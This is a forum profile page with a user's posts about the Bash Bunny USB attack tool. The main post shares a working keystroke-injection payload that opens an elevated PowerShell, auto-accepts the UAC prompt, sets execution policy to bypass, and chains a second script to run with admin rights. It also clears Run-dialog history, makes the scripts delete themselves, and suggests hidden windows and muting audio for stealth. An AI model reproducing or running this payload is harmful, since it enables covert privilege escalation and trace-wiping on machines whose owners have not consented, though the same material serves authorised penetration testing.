Jump to content

Dracstic

Members
  • Posts

    3
  • Joined

  • Last visited

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

Dracstic's Achievements

Newbie

Newbie (1/14)

  1. I'll keep that in mind. Running one script from the bashbunny would work great for quick jobs. Unfortunately the project I'm working on downloads and runs multiple executables and takes over an hour to complete. I know powershell scripts are copied to and ran from memory but I was having issues with reliability after the script was started and the bashbunny was unplugged. With the two script setup I can unplug the bashbunny as soon as the first script closes.
  2. Hello all, I'm working on a project that requires multiple programs to run in parallel and when started individually each one triggers a UAC window. After some tinkering I came to the following solution and wanted to pass it along. Hope it helps. It starts with modifying the run.sh file in the extensions folder. I added the following code after the line "case "$os" in". This isn't strictly needed but I plan on using this in the future as well. WIN_UAC) QUACK GUI r QUACK DELAY 500 QUACK STRING "$@" QUACK CTRL-SHIFT ENTER QUACK DELAY 1000 QUACK ALT y QUACK ALT c QUACK LEFTARROW QUACK ENTER QUACK ENTER ;; I then created the BashBunny payload that would copy the file p2.ps1 from the switch# folder to the root of the USB storage and then call a quick powershell script using the new RUN WIN_UAC command that I just added. ######## INITIALIZATION ######## LED SETUP GET SWITCH_POSITION ATTACKMODE HID STORAGE cp /root/udisk/payloads/$SWITCH_POSITION/p2.ps1 /root/udisk/p2.ps1 ######## ATTACK ######## LED ATTACK Q DELAY 1000 RUN WIN_UAC "powerShell .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\p1.ps1')" ######## FINISH ######## LED FINISH The RUN WIN_UAC command will run the powershell script p1.ps1 with administrator privileges. p1.ps1 will copy p2.ps1 from the root of the BashBunny storage to a temporary folder on the PC and then run p2.ps1 with admin privileges. At this time the BashBunny can be unplugged. #Setup Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue #Clear run command window Set-ExecutionPolicy bypass -force #disable UAC for this script Copy-Item ((gwmi win32_volume -f 'label=''BashBunny''').Name+'p2.ps1') -Destination $env:temp; Start-Process powershell (($env:temp)+'\p2.ps1') #Copy p2.ps1 from BashBunny storage root to temp folder on PC then run p2.ps1. P2.ps1 will run with admin privileges from the temporary folder and when it's job is complete will delete itself and end the powershell process. #Setup Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue #Clear run command window Set-ExecutionPolicy bypass -force #disable UAC for this script #Your payload here with all the privileges. Remove-Item (($env:temp)+'\p1.ps1') #Delete this script file Stop-Process -Id $PID #End this process #End ################################################################################################ To add stealthyness I would add -windowstyle hidden to the Start-Process lines as well as turn down the volume or mute before the UAC window is triggered. What do you think? Drac.
  3. I get the same problem. I'm able to get around it by unplug/replug the Nano while wp6.sh is waiting to detect. It will come up after a few seconds and work fine after that.
×
×
  • Create New...